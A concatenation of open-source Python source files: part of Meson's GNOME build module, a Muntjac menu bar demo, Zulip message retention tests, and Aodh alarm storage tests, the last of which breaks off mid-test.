scan_command += ['--symbol-prefix=%s' % sym_prefix]
if kwargs.get('identifier_prefix'):
identifier_prefix = kwargs.pop('identifier_prefix')
if not isinstance(identifier_prefix, str):
raise MesonException('Gir identifier prefix must be str')
scan_command += ['--identifier-prefix=%s' % identifier_prefix]
if kwargs.get('export_packages'):
pkgs = kwargs.pop('export_packages')
if isinstance(pkgs, str):
scan_command += ['--pkg-export=%s' % pkgs]
elif isinstance(pkgs, list):
scan_command += ['--pkg-export=%s' % pkg for pkg in pkgs]
else:
raise MesonException('Gir export packages must be str or list')
deps = None
if 'dependencies' in kwargs:
deps = kwargs.pop('dependencies')
if not isinstance (deps, list):
deps = [deps]
for dep in deps:
girdir = dep.held_object.get_variable ("girdir")
if girdir:
scan_command += ["--add-include-path=%s" % girdir]
inc_dirs = None
if kwargs.get('include_directories'):
inc_dirs = kwargs.pop('include_directories')
if isinstance(inc_dirs.held_object, build.IncludeDirs):
scan_command += ['--add-include-path=%s' % inc for inc in inc_dirs.held_object.get_incdirs()]
else:
raise MesonException('Gir include dirs should be include_directories()')
if isinstance(girtarget, build.Executable):
scan_command += ['--program', girtarget]
elif isinstance(girtarget, build.SharedLibrary):
scan_command += ["-L", os.path.join (state.environment.get_build_dir(), girtarget.subdir)]
libname = girtarget.get_basename()
scan_command += ['--library', libname]
scankwargs = {'output' : girfile,
'input' : libsources,
'command' : scan_command,
'depends' : depends,
}
if kwargs.get('install'):
scankwargs['install'] = kwargs['install']
scankwargs['install_dir'] = os.path.join(state.environment.get_datadir(), 'gir-1.0')
scan_target = GirTarget(girfile, state.subdir, scankwargs)
typelib_output = '%s-%s.typelib' % (ns, nsversion)
typelib_cmd = ['g-ir-compiler', scan_target, '--output', '@OUTPUT@']
if inc_dirs:
typelib_cmd += ['--includedir=%s' % inc for inc in
inc_dirs.held_object.get_incdirs()]
if deps:
for dep in deps:
girdir = dep.held_object.get_variable ("girdir")
if girdir:
typelib_cmd += ["--includedir=%s" % girdir]
kwargs['output'] = typelib_output
kwargs['command'] = typelib_cmd
# Note that this can't be libdir, because e.g. on Debian it points to
# lib/x86_64-linux-gnu but the girepo dir is always under lib.
kwargs['install_dir'] = 'lib/girepository-1.0'
typelib_target = TypelibTarget(typelib_output, state.subdir, kwargs)
return [scan_target, typelib_target]
def compile_schemas(self, state, args, kwargs):
if len(args) != 0:
raise MesonException('Compile_schemas does not take positional arguments.')
srcdir = os.path.join(state.build_to_src, state.subdir)
outdir = state.subdir
cmd = ['glib-compile-schemas', '--targetdir', outdir, srcdir]
kwargs['command'] = cmd
kwargs['input'] = []
kwargs['output'] = 'gschemas.compiled'
if state.subdir == '':
targetname = 'gsettings-compile'
else:
targetname = 'gsettings-compile-' + state.subdir
target_g = build.CustomTarget(targetname, state.subdir, kwargs)
return target_g
def gtkdoc(self, state, args, kwargs):
if len(args) != 1:
raise MesonException('Gtkdoc must have one positional argument.')
modulename = args[0]
if not isinstance(modulename, str):
raise MesonException('Gtkdoc arg must be string.')
if not 'src_dir' in kwargs:
raise MesonException('Keyword argument src_dir missing.')
main_file = kwargs.get('main_sgml', '')
if not isinstance(main_file, str):
raise MesonException('Main sgml keyword argument must be a string.')
main_xml = kwargs.get('main_xml', '')
if not isinstance(main_xml, str):
raise MesonException('Main xml keyword argument must be a string.')
if main_xml != '':
if main_file != '':
raise MesonException('You can only specify main_xml or main_sgml, not both.')
main_file = main_xml
src_dir = kwargs['src_dir']
targetname = modulename + '-doc'
command = os.path.normpath(os.path.join(os.path.split(__file__)[0], "../gtkdochelper.py"))
args = [state.environment.get_source_dir(),
state.environment.get_build_dir(),
state.subdir,
os.path.normpath(os.path.join(state.subdir, src_dir)),
main_file,
modulename]
res = [build.RunTarget(targetname, command, args, state.subdir)]
if kwargs.get('install', True):
res.append(build.InstallScript([command] + args))
return res
def gdbus_codegen(self, state, args, kwargs):
if len(args) != 2:
raise MesonException('Gdbus_codegen takes two arguments, name and xml file.')
namebase = args[0]
xml_file = args[1]
cmd = ['gdbus-codegen']
if 'interface_prefix' in kwargs:
cmd += ['--interface-prefix', kwargs.pop('interface_prefix')]
if 'namespace' in kwargs:
cmd += ['--c-namespace', kwargs.pop('namespace')]
cmd += ['--generate-c-code', os.path.join(state.subdir, namebase), '@INPUT@']
outputs = [namebase + '.c', namebase + '.h']
custom_kwargs = {'input' : xml_file,
'output' : outputs,
'command' : cmd
}
return build.CustomTarget(namebase + '-gdbus', state.subdir, custom_kwargs)
def initialize():
mlog.log('Warning, glib compiled dependencies will not work until this upstream issue is fixed:',
mlog.bold('https://bugzilla.gnome.org/show_bug.cgi?id=745754'))
return GnomeModule()
class GirTarget(build.CustomTarget):
def __init__(self, name, subdir, kwargs):
super().__init__(name, subdir, kwargs)
class TypelibTarget(build.CustomTarget):
def __init__(self, name, subdir, kwargs):
super().__init__(name, subdir, kwargs)
| evgenyz/meson | modules/gnome.py | Python | apache-2.0 | 10,923 |
from muntjac.ui.vertical_layout import VerticalLayout
from muntjac.ui.menu_bar import MenuBar, ICommand
from muntjac.terminal.external_resource import ExternalResource
class MenuBarItemStylesExample(VerticalLayout):
def __init__(self):
super(MenuBarItemStylesExample, self).__init__()
self._menubar = MenuBar()
menuCommand = MenuCommand(self)
# Save reference to individual items so we can add sub-menu items to
# them
f = self._menubar.addItem('File', None)
newItem = f.addItem('New', None)
f.addItem('Open f...', menuCommand)
f.addSeparator()
# Add a style name for a menu item, then use CSS to alter the visuals
f.setStyleName('file')
newItem.addItem('File', menuCommand)
newItem.addItem('Folder', menuCommand)
newItem.addItem('Project...', menuCommand)
f.addItem('Close', menuCommand)
f.addItem('Close All', menuCommand).setStyleName('close-all')
f.addSeparator()
f.addItem('Save', menuCommand)
f.addItem('Save As...', menuCommand)
f.addItem('Save All', menuCommand)
edit = self._menubar.addItem('Edit', None)
edit.addItem('Undo', menuCommand)
edit.addItem('Redo', menuCommand).setEnabled(False)
edit.addSeparator()
edit.addItem('Cut', menuCommand)
edit.addItem('Copy', menuCommand)
edit.addItem('Paste', menuCommand)
edit.addSeparator()
find = edit.addItem('Find/Replace', menuCommand)
# Actions can be added inline as well, of course
find.addItem('Google Search', SearchCommand(self))
find.addSeparator()
find.addItem('Find/Replace...', menuCommand)
find.addItem('Find Next', menuCommand)
find.addItem('Find Previous', menuCommand)
view = self._menubar.addItem('View', None)
view.addItem('Show/Hide Status Bar', menuCommand)
view.addItem('Customize Toolbar...', menuCommand)
view.addSeparator()
view.addItem('Actual Size', menuCommand)
view.addItem('Zoom In', menuCommand)
view.addItem('Zoom Out', menuCommand)
self.addComponent(self._menubar)
class SearchCommand(ICommand):
def __init__(self, c):
self._c = c
def menuSelected(self, selectedItem):
er = ExternalResource('http://www.google.com')
self._c.getWindow().open(er)
class MenuCommand(ICommand):
def __init__(self, c):
self._c = c
def menuSelected(self, selectedItem):
self._c.getWindow().showNotification('Action '
+ selectedItem.getText())
| rwl/muntjac | muntjac/demo/sampler/features/menubar/MenuBarItemStylesExample.py | Python | apache-2.0 | 2,645 |
# -*- coding: utf-8 -*-
import types
from datetime import datetime, timedelta
from django.utils.timezone import now as timezone_now
from zerver.lib.test_classes import ZulipTestCase
from zerver.lib.upload import create_attachment
from zerver.models import Message, Realm, Recipient, UserProfile, UserMessage, ArchivedUserMessage, \
ArchivedMessage, Attachment, ArchivedAttachment
from zerver.lib.retention import get_expired_messages, move_message_to_archive
from typing import Any, List
from six.moves import range
class TestRetentionLib(ZulipTestCase):
"""
Test receiving expired messages retention tool.
"""
def setUp(self):
# type: () -> None
super(TestRetentionLib, self).setUp()
self.zulip_realm = self._set_realm_message_retention_value('zulip', 30)
self.mit_realm = self._set_realm_message_retention_value('zephyr', 100)
@staticmethod
def _set_realm_message_retention_value(realm_str, retention_period):
# type: (str, int) -> Realm
realm = Realm.objects.get(string_id=realm_str)
realm.message_retention_days = retention_period
realm.save()
return realm
@staticmethod
def _change_messages_pub_date(msgs_ids, pub_date):
# type: (List[int], datetime) -> Any
messages = Message.objects.filter(id__in=msgs_ids).order_by('id')
messages.update(pub_date=pub_date)
return messages
def _make_mit_messages(self, message_quantity, pub_date):
# type: (int, datetime) -> Any
# send messages from mit.edu realm and change messages pub date
sender = self.mit_user('espuser')
recipient = self.mit_user('starnine')
msgs_ids = [self.send_message(sender.email, recipient.email, Recipient.PERSONAL) for i in
range(message_quantity)]
mit_messages = self._change_messages_pub_date(msgs_ids, pub_date)
return mit_messages
def test_expired_messages_result_type(self):
# type: () -> None
# Check return type of get_expired_message method.
result = get_expired_messages()
self.assertIsInstance(result, types.GeneratorType)
def test_no_expired_messages(self):
# type: () -> None
result = list(get_expired_messages())
self.assertFalse(result)
def test_expired_messages_in_each_realm(self):
# type: () -> None
# Check result realm messages order and result content
# when all realm has expired messages.
expired_mit_messages = self._make_mit_messages(3, timezone_now() - timedelta(days=101))
self._make_mit_messages(4, timezone_now() - timedelta(days=50))
zulip_messages_ids = Message.objects.order_by('id').filter(
sender__realm=self.zulip_realm).values_list('id', flat=True)[3:10]
expired_zulip_messages = self._change_messages_pub_date(zulip_messages_ids,
timezone_now() - timedelta(days=31))
# Iterate by result
expired_messages_result = [messages_list for messages_list in get_expired_messages()]
self.assertEqual(len(expired_messages_result), 2)
# Check mit.edu realm expired messages.
self.assertEqual(len(expired_messages_result[0]['expired_messages']), 3)
self.assertEqual(expired_messages_result[0]['realm_id'], self.mit_realm.id)
# Check zulip.com realm expired messages.
self.assertEqual(len(expired_messages_result[1]['expired_messages']), 7)
self.assertEqual(expired_messages_result[1]['realm_id'], self.zulip_realm.id)
# Compare expected messages ids with result messages ids.
self.assertEqual(
sorted([message.id for message in expired_mit_messages]),
[message.id for message in expired_messages_result[0]['expired_messages']]
)
self.assertEqual(
sorted([message.id for message in expired_zulip_messages]),
[message.id for message in expired_messages_result[1]['expired_messages']]
)
def test_expired_messages_in_one_realm(self):
# type: () -> None
# Check realm with expired messages and messages
# with one day to expiration data.
expired_mit_messages = self._make_mit_messages(5, timezone_now() - timedelta(days=101))
actual_mit_messages = self._make_mit_messages(3, timezone_now() - timedelta(days=99))
expired_messages_result = list(get_expired_messages())
expired_mit_messages_ids = [message.id for message in expired_mit_messages]
expired_mit_messages_result_ids = [message.id for message in
expired_messages_result[0]['expired_messages']]
actual_mit_messages_ids = [message.id for message in actual_mit_messages]
self.assertEqual(len(expired_messages_result), 1)
self.assertEqual(len(expired_messages_result[0]['expired_messages']), 5)
self.assertEqual(expired_messages_result[0]['realm_id'], self.mit_realm.id)
# Compare expected messages ids with result messages ids.
self.assertEqual(
sorted(expired_mit_messages_ids),
expired_mit_messages_result_ids
)
# Check actual mit.edu messages are not contained in expired messages list
self.assertEqual(
set(actual_mit_messages_ids) - set(expired_mit_messages_ids),
set(actual_mit_messages_ids)
)
class TestMoveMessageToArchive(ZulipTestCase):
def setUp(self):
# type: () -> None
super(TestMoveMessageToArchive, self).setUp()
self.sender = '[email protected]'
self.recipient = '[email protected]'
def _create_attachments(self):
# type: () -> None
sample_size = 10
dummy_files = [
('zulip.txt', '1/31/4CBjtTLYZhk66pZrF8hnYGwc/zulip.txt', sample_size),
('temp_file.py', '1/31/4CBjtTLYZhk66pZrF8hnYGwc/temp_file.py', sample_size),
('abc.py', '1/31/4CBjtTLYZhk66pZrF8hnYGwc/abc.py', sample_size)
]
user_profile = self.example_user('hamlet')
for file_name, path_id, size in dummy_files:
create_attachment(file_name, path_id, user_profile, size)
def _check_messages_before_archiving(self, msg_id):
# type: (int) -> List
user_messages_ids_before = list(UserMessage.objects.filter(
message_id=msg_id).order_by('id').values_list('id', flat=True))
self.assertEqual(ArchivedUserMessage.objects.count(), 0)
self.assertEqual(ArchivedMessage.objects.count(), 0)
return user_messages_ids_before
def _check_messages_after_archiving(self, msg_id, user_msgs_ids_before):
# type: (int, List[int]) -> None
self.assertEqual(ArchivedMessage.objects.filter(id=msg_id).count(), 1)
self.assertEqual(Message.objects.filter(id=msg_id).count(), 0)
self.assertEqual(UserMessage.objects.filter(message_id=msg_id).count(), 0)
arc_user_messages_ids_after = list(ArchivedUserMessage.objects.filter(
message_id=msg_id).order_by('id').values_list('id', flat=True))
self.assertEqual(arc_user_messages_ids_after, user_msgs_ids_before)
def test_personal_message_archiving(self):
# type: ()-> None
msg_id = self.send_message(self.sender, [self.recipient], Recipient.PERSONAL)
user_messages_ids_before = self._check_messages_before_archiving(msg_id)
move_message_to_archive(message_id=msg_id)
self._check_messages_after_archiving(msg_id, user_messages_ids_before)
def test_stream_message_archiving(self):
# type: ()-> None
msg_id = self.send_message(self.sender, "Verona", Recipient.STREAM)
user_messages_ids_before = self._check_messages_before_archiving(msg_id)
move_message_to_archive(message_id=msg_id)
self._check_messages_after_archiving(msg_id, user_messages_ids_before)
def test_archiving_message_second_time(self):
# type: ()-> None
msg_id = self.send_message(self.sender, "Verona", Recipient.STREAM)
user_messages_ids_before = self._check_messages_before_archiving(msg_id)
move_message_to_archive(message_id=msg_id)
self._check_messages_after_archiving(msg_id, user_messages_ids_before)
with self.assertRaises(Message.DoesNotExist):
move_message_to_archive(message_id=msg_id)
def test_archiving_message_with_attachment(self):
# type: () -> None
self._create_attachments()
body = """Some files here ...[zulip.txt](
http://localhost:9991/user_uploads/1/31/4CBjtTLYZhk66pZrF8hnYGwc/zulip.txt)
http://localhost:9991/user_uploads/1/31/4CBjtTLYZhk66pZrF8hnYGwc/temp_file.py ....
Some more.... http://localhost:9991/user_uploads/1/31/4CBjtTLYZhk66pZrF8hnYGwc/abc.py
"""
msg_id = self.send_message(self.sender, [self.recipient], Recipient.PERSONAL, body)
user_messages_ids_before = self._check_messages_before_archiving(msg_id)
attachments_ids_before = list(Attachment.objects.filter(
messages__id=msg_id).order_by("id").values_list("id", flat=True))
self.assertEqual(ArchivedAttachment.objects.count(), 0)
move_message_to_archive(message_id=msg_id)
self._check_messages_after_archiving(msg_id, user_messages_ids_before)
self.assertEqual(Attachment.objects.count(), 0)
arc_attachments_ids_after = list(ArchivedAttachment.objects.filter(
messages__id=msg_id).order_by("id").values_list("id", flat=True))
self.assertEqual(attachments_ids_before, arc_attachments_ids_after)
def test_archiving_message_with_shared_attachment(self):
# type: () -> None
# Check do not removing attachments which is used in other messages.
self._create_attachments()
body = """Some files here ...[zulip.txt](
http://localhost:9991/user_uploads/1/31/4CBjtTLYZhk66pZrF8hnYGwc/zulip.txt)
http://localhost:9991/user_uploads/1/31/4CBjtTLYZhk66pZrF8hnYGwc/temp_file.py ....
Some more.... http://localhost:9991/user_uploads/1/31/4CBjtTLYZhk66pZrF8hnYGwc/abc.py
"""
msg_id = self.send_message(self.sender, [self.recipient], Recipient.PERSONAL, body)
msg_id_shared_attachments = self.send_message(self.recipient, [self.sender],
Recipient.PERSONAL, body)
user_messages_ids_before = self._check_messages_before_archiving(msg_id)
attachments_ids_before = list(Attachment.objects.filter(
messages__id=msg_id).order_by("id").values_list("id", flat=True))
self.assertEqual(ArchivedAttachment.objects.count(), 0)
move_message_to_archive(message_id=msg_id)
self._check_messages_after_archiving(msg_id, user_messages_ids_before)
self.assertEqual(Attachment.objects.count(), 3)
arc_attachments_ids_after = list(ArchivedAttachment.objects.filter(
messages__id=msg_id).order_by("id").values_list("id", flat=True))
self.assertEqual(attachments_ids_before, arc_attachments_ids_after)
move_message_to_archive(message_id=msg_id_shared_attachments)
self.assertEqual(Attachment.objects.count(), 0)
| amanharitsh123/zulip | zerver/tests/test_retention.py | Python | apache-2.0 | 11,333 |
#
# Copyright 2013 Intel Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" Base classes for DB backend implementation test
"""
import datetime
from unittest import mock
from oslo_utils import timeutils
from aodh import storage
from aodh.storage import models as alarm_models
from aodh.tests import constants
from aodh.tests.functional import db as tests_db
ALARM_TYPE = 'gnocchi_aggregation_by_metrics_threshold'
METRIC_IDS = ['41869681-5776-46d6-91ed-cccc43b6e4e3',
'a1fb80f4-c242-4f57-87c6-68f47521059e']
class DBTestBase(tests_db.TestBase):
@staticmethod
def create_side_effect(method, exception_type, test_exception):
def side_effect(*args, **kwargs):
if test_exception.pop():
raise exception_type
else:
return method(*args, **kwargs)
return side_effect
def setUp(self):
super(DBTestBase, self).setUp()
patcher = mock.patch.object(timeutils, 'utcnow')
self.addCleanup(patcher.stop)
self.mock_utcnow = patcher.start()
self.mock_utcnow.return_value = datetime.datetime(2015, 7, 2, 10, 39)
class AlarmTestBase(DBTestBase):
def add_some_alarms(self):
alarms = [alarm_models.Alarm(alarm_id='r3d',
enabled=True,
type=ALARM_TYPE,
name='red-alert',
description='my red-alert',
timestamp=datetime.datetime(2015, 7,
2, 10, 25),
user_id='me',
project_id='and-da-boys',
state="insufficient data",
state_reason="insufficient data",
state_timestamp=constants.MIN_DATETIME,
ok_actions=[],
alarm_actions=['http://nowhere/alarms'],
insufficient_data_actions=[],
repeat_actions=False,
time_constraints=[dict(name='testcons',
start='0 11 * * *',
duration=300)],
rule=dict(comparison_operator='eq',
threshold=36,
aggregation_method='count',
evaluation_periods=1,
granularity=60,
metrics=METRIC_IDS),
severity='low'
),
alarm_models.Alarm(alarm_id='0r4ng3',
enabled=True,
type=ALARM_TYPE,
name='orange-alert',
description='a orange',
timestamp=datetime.datetime(2015, 7,
2, 10, 40),
user_id='me',
project_id='and-da-boys',
state="insufficient data",
state_reason="insufficient data",
state_timestamp=constants.MIN_DATETIME,
ok_actions=[],
alarm_actions=['http://nowhere/alarms'],
insufficient_data_actions=[],
repeat_actions=False,
time_constraints=[],
rule=dict(comparison_operator='gt',
threshold=75,
aggregation_method='avg',
evaluation_periods=1,
granularity=60,
metrics=METRIC_IDS),
severity='low'
),
alarm_models.Alarm(alarm_id='y3ll0w',
enabled=False,
type=ALARM_TYPE,
name='yellow-alert',
description='yellow',
timestamp=datetime.datetime(2015, 7,
2, 10, 10),
user_id='me',
project_id='and-da-boys',
state="insufficient data",
state_reason="insufficient data",
state_timestamp=constants.MIN_DATETIME,
ok_actions=[],
alarm_actions=['http://nowhere/alarms'],
insufficient_data_actions=[],
repeat_actions=False,
time_constraints=[],
rule=dict(comparison_operator='lt',
threshold=10,
aggregation_method='min',
evaluation_periods=1,
granularity=60,
metrics=METRIC_IDS),
severity='low'
)]
for a in alarms:
self.alarm_conn.create_alarm(a)
class AlarmTest(AlarmTestBase):
def test_empty(self):
alarms = list(self.alarm_conn.get_alarms())
self.assertEqual([], alarms)
def test_list(self):
self.add_some_alarms()
alarms = list(self.alarm_conn.get_alarms())
self.assertEqual(3, len(alarms))
def test_list_ordered_by_timestamp(self):
self.add_some_alarms()
alarms = list(self.alarm_conn.get_alarms())
self.assertEqual(len(alarms), 3)
alarm_l = [a.timestamp for a in alarms]
alarm_l_ordered = [datetime.datetime(2015, 7, 2, 10, 40),
datetime.datetime(2015, 7, 2, 10, 25),
datetime.datetime(2015, 7, 2, 10, 10)]
self.assertEqual(alarm_l_ordered, alarm_l)
def test_list_enabled(self):
self.add_some_alarms()
alarms = list(self.alarm_conn.get_alarms(enabled=True))
self.assertEqual(2, len(alarms))
def test_list_disabled(self):
self.add_some_alarms()
alarms = list(self.alarm_conn.get_alarms(enabled=False))
self.assertEqual(1, len(alarms))
def test_list_by_type(self):
self.add_some_alarms()
alarms = list(self.alarm_conn.get_alarms(type=ALARM_TYPE))
self.assertEqual(3, len(alarms))
def test_list_excluded_by_name(self):
self.add_some_alarms()
alarms = list(self.alarm_conn.get_alarms(name={'ne': 'yellow-alert'}))
self.assertEqual(2, len(alarms))
alarm_names = sorted([a.name for a in alarms])
self.assertEqual(['orange-alert', 'red-alert'], alarm_names)
def test_add(self):
self.add_some_alarms()
alarms = list(self.alarm_conn.get_alarms())
self.assertEqual(3, len(alarms))
metrics = sorted([a.rule['metrics'] for a in alarms])
self.assertEqual([METRIC_IDS, METRIC_IDS, METRIC_IDS], metrics)
def test_update(self):
self.add_some_alarms()
metrics = ['6841c175-d7c4-4bc2-bc7a-1c7832271b8f',
'bc1efaa5-93b4-4518-8337-18519917c15a']
orange = list(self.alarm_conn.get_alarms(name='orange-alert'))[0]
orange.enabled = False
orange.state = alarm_models.Alarm.ALARM_INSUFFICIENT_DATA
orange.rule['metrics'] = metrics
updated = self.alarm_conn.update_alarm(orange)
self.assertFalse(updated.enabled)
self.assertEqual(alarm_models.Alarm.ALARM_INSUFFICIENT_DATA,
updated.state)
self.assertEqual(metrics, updated.rule['metrics'])
def test_update_llu(self):
llu = alarm_models.Alarm(alarm_id='llu',
enabled=True,
type=ALARM_TYPE,
name='llu',
description='llu',
timestamp=constants.MIN_DATETIME,
user_id='bla',
project_id='ffo',
state="insufficient data",
state_reason="insufficient data",
state_timestamp=constants.MIN_DATETIME,
ok_actions=[],
alarm_actions=[],
insufficient_data_actions=[],
repeat_actions=False,
time_constraints=[],
rule=dict(comparison_operator='lt',
threshold=34,
aggregation_method='max',
evaluation_periods=1,
granularity=60,
metrics=METRIC_IDS)
)
updated = self.alarm_conn.create_alarm(llu)
updated.state = alarm_models.Alarm.ALARM_OK
updated.description = ':)'
self.alarm_conn.update_alarm(updated)
all = list(self.alarm_conn.get_alarms())
self.assertEqual(1, len(all))
def test_update_deleted_alarm_failed(self):
self.add_some_alarms()
alarm1 = list(self.alarm_conn.get_alarms(name='orange-alert'))[0]
self.alarm_conn.delete_alarm(alarm1.alarm_id)
survivors = list(self.alarm_conn.get_alarms())
self.assertEqual(2, len(survivors))
alarm1.state = alarm_models.Alarm.ALARM_ALARM
self.assertRaises(storage.AlarmNotFound,
self.alarm_conn.update_alarm, alarm1)
survivors = list(self.alarm_conn.get_alarms())
self.assertEqual(2, len(survivors))
def test_delete(self):
self.add_some_alarms()
victim = list(self.alarm_conn.get_alarms(name='orange-alert'))[0]
self.alarm_conn.delete_alarm(victim.alarm_id)
survivors = list(self.alarm_conn.get_alarms())
self.assertEqual(2, len(survivors))
for s in survivors:
self.assertNotEqual(victim.name, s.name)
class AlarmHistoryTest(AlarmTestBase):
def setUp(self):
super(AlarmTestBase, self).setUp()
self.add_some_alarms()
self.prepare_alarm_history()
def prepare_alarm_history(self):
alarms = list(self.alarm_conn.get_alarms())
for alarm in alarms:
i = alarms.index(alarm)
alarm_change = {
"event_id": "3e11800c-a3ca-4991-b34b-d97efb6047d%s" % i,
"alarm_id": alarm.alarm_id,
"type": alarm_models.AlarmChange.CREATION,
"detail": "detail %s" % alarm.name,
"user_id": alarm.user_id,
"project_id": alarm.project_id,
"on_behalf_of": alarm.project_id,
"timestamp": datetime.datetime(2014, 4, 7, 7, 30 + i)
}
self.alarm_conn.record_alarm_change(alarm_change=alarm_change)
def _clear_alarm_history(self, utcnow, ttl, count):
self.mock_utcnow.return_value = utcnow
self.alarm_conn.clear_expired_alarm_history_data(ttl, 100)
history = list(self.alarm_conn.query_alarm_history())
self.assertEqual(count, len(history))
def test_clear_alarm_history_no_data_to_remove(self):
utcnow = datetime.datetime(2013, 4, 7, 7, 30)
self._clear_alarm_history(utcnow, 1, 3)
def test_clear_some_alarm_history(self):
utcnow = datetime.datetime(2014, 4, 7, 7, 35)
self._clear_alarm_history(utcnow, 3 * 60, 1)
def test_clear_all_alarm_history(self):
utcnow = datetime.datetime(2014, 4, 7, 7, 45)
self._clear_alarm_history(utcnow, 3 * 60, 0)
def test_delete_history_when_delete_alarm(self):
alarms = list(self.alarm_conn.get_alarms())
self.assertEqual(3, len(alarms))
history = list(self.alarm_conn.query_alarm_history())
self.assertEqual(3, len(history))
for alarm in alarms:
self.alarm_conn.delete_alarm(alarm.alarm_id)
self.assertEqual(3, len(alarms))
history = list(self.alarm_conn.query_alarm_history())
self.assertEqual(0, len(history))
def test_record_severity_when_alarm_change(self):
alarm = list(self.alarm_conn.get_alarms(name='orange-alert'))[0]
severity = "low"
alarm_change = {
"event_id": "3d22800c-a3ca-4991-b34b-d97efb6047d9",
"alarm_id": alarm.alarm_id,
"type": alarm_models.AlarmChange.STATE_TRANSITION,
"detail": "detail %s" % alarm.name,
"user_id": alarm.user_id,
"project_id": alarm.project_id,
"on_behalf_of": alarm.project_id,
"severity": severity,
"timestamp": datetime.datetime(2014, 4, 7, 7, 34)
}
self.alarm_conn.record_alarm_change(alarm_change=alarm_change)
filter_expr = {"=": {"severity": "low"}}
history = list(self.alarm_conn.query_alarm_history(
filter_expr=filter_expr))
self.assertEqual(1, len(history))
self.assertEqual("low", history[0].severity)
class ComplexAlarmQueryTest(AlarmTestBase):
def test_no_filter(self):
self.add_some_alarms()
result = list(self.alarm_conn.query_alarms())
self.assertEqual(3, len(result))
def test_no_filter_with_limit(self):
self.add_some_alarms()
result = list(self.alarm_conn.query_alarms(limit=2))
self.assertEqual(2, len(result))
def test_filter(self):
self.add_some_alarms()
filter_expr = {"and":
[{"or":
[{"=": {"name": "yellow-alert"}},
{"=": {"name": "red-alert"}}]},
{"=": {"enabled": True}}]}
result = list(self.alarm_conn.query_alarms(filter_expr=filter_expr))
self.assertEqual(1, len(result))
for a in result:
self.assertIn(a.name, set(["yellow-alert", "red-alert"]))
self.assertTrue(a.enabled)
def test_filter_with_regexp(self):
self.add_some_alarms()
filter_expr = {"and":
[{"or": [{"=": {"name": "yellow-alert"}},
{"=": {"name": "red-alert"}}]},
{"=~": {"description": "yel.*"}}]}
result = list(self.alarm_conn.query_alarms(filter_expr=filter_expr))
self.assertEqual(1, len(result))
for a in result:
self.assertEqual("yellow", a.description)
def test_filter_for_alarm_id(self):
self.add_some_alarms()
filter_expr = {"=": {"alarm_id": "0r4ng3"}}
result = list(self.alarm_conn.query_alarms(filter_expr=filter_expr))
self.assertEqual(1, len(result))
for a in result:
self.assertEqual("0r4ng3", a.alarm_id)
def test_filter_and_orderby(self):
self.add_some_alarms()
result = list(self.alarm_conn.query_alarms(filter_expr=(
{"=": {"enabled": True}}),
orderby=[{"name": "asc"}]))
self.assertEqual(2, len(result))
self.assertEqual(["orange-alert", "red-alert"],
[a.name for a in result])
for a in result:
self.assertTrue(a.enabled)
class ComplexAlarmHistoryQueryTest(AlarmTestBase):
def setUp(self):
super(DBTestBase, self).setUp()
self.filter_expr = {"and":
[{"or":
[{"=": {"type": "rule change"}},
{"=": {"type": "state transition"}}]},
{"=": {"alarm_id": "0r4ng3"}}]}
self.add_some_alarms()
self.prepare_alarm_history()
def prepare_alarm_history(self):
alarms = list(self.alarm_conn.get_alarms())
name_index = {
'red-alert': 0,
'orange-alert': 1,
'yellow-alert': 2
}
for alarm in alarms:
i = name_index[alarm.name]
alarm_change = dict(event_id=(
"16fd2706-8baf-433b-82eb-8c7fada847c%s" % i),
alarm_id=alarm.alarm_id,
type=alarm_models.AlarmChange.CREATION,
detail="detail %s" % alarm.name,
user_id=alarm.user_id,
project_id=alarm.project_id,
on_behalf_of=alarm.project_id,
timestamp=datetime.datetime(2012, 9, 24,
7 + i,
30 + i))
self.alarm_conn.record_alarm_change(alarm_change=alarm_change)
alarm_change2 = dict(event_id=(
"16fd2706-8baf-433b-82eb-8c7fada847d%s" % i),
alarm_id=alarm.alarm_id,
type=alarm_models.AlarmChange.RULE_CHANGE,
detail="detail %s" % i,
user_id=alarm.user_id,
project_id=alarm.project_id,
on_behalf_of=alarm.project_id,
timestamp=datetime.datetime(2012, 9, 25,
10 + i,
30 + i))
self.alarm_conn.record_alarm_change(alarm_change=alarm_change2)
alarm_change3 = dict(
event_id="16fd2706-8baf-433b-82eb-8c7fada847e%s" % i,
alarm_id=alarm.alarm_id,
type=alarm_models.AlarmChange.STATE_TRANSITION,
detail="detail %s" % (i + 1),
user_id=alarm.user_id,
project_id=alarm.project_id,
on_behalf_of=alarm.project_id,
timestamp=datetime.datetime(2012, 9, 26, 10 + i, 30 + i)
)
if alarm.name == "red-alert":
alarm_change3['on_behalf_of'] = 'and-da-girls'
self.alarm_conn.record_alarm_change(alarm_change=alarm_change3)
def test_alarm_history_with_no_filter(self):
history = list(self.alarm_conn.query_alarm_history())
self.assertEqual(9, len(history))
def test_alarm_history_with_no_filter_and_limit(self):
history = list(self.alarm_conn.query_alarm_history(limit=3))
self.assertEqual(3, len(history))
def test_alarm_history_with_filter(self):
history = list(
self.alarm_conn.query_alarm_history(filter_expr=self.filter_expr))
self.assertEqual(2, len(history))
def test_alarm_history_with_regexp(self):
filter_expr = {"and":
[{"=~": {"type": "(rule)|(state)"}},
{"=": {"alarm_id": "0r4ng3"}}]}
history = list(
self.alarm_conn.query_alarm_history(filter_expr=filter_expr))
self.assertEqual(2, len(history))
def test_alarm_history_with_filter_and_orderby(self):
history = list(
self.alarm_conn.query_alarm_history(filter_expr=self.filter_expr,
orderby=[{"timestamp":
"asc"}]))
self.assertEqual([alarm_models.AlarmChange.RULE_CHANGE,
alarm_models.AlarmChange.STATE_TRANSITION],
[h.type for h in history])
def test_alarm_history_with_filter_and_orderby_and_limit(self):
history = list(
self.alarm_conn.query_alarm_history(filter_expr=self.filter_expr,
orderby=[{"timestamp":
"asc"}],
limit=1))
self.assertEqual(alarm_models.AlarmChange.RULE_CHANGE, history[0].type)
def test_alarm_history_with_on_behalf_of_filter(self):
filter_expr = {"=": {"on_behalf_of": "and-da-girls"}}
history = list(self.alarm_conn.query_alarm_history(
filter_expr=filter_expr))
self.assertEqual(1, len(history))
self.assertEqual("16fd2706-8baf-433b-82eb-8c7fada847e0",
history[0].event_id)
def test_alarm_history_with_alarm_id_as_filter(self):
filter_expr = {"=": {"alarm_id": "r3d"}}
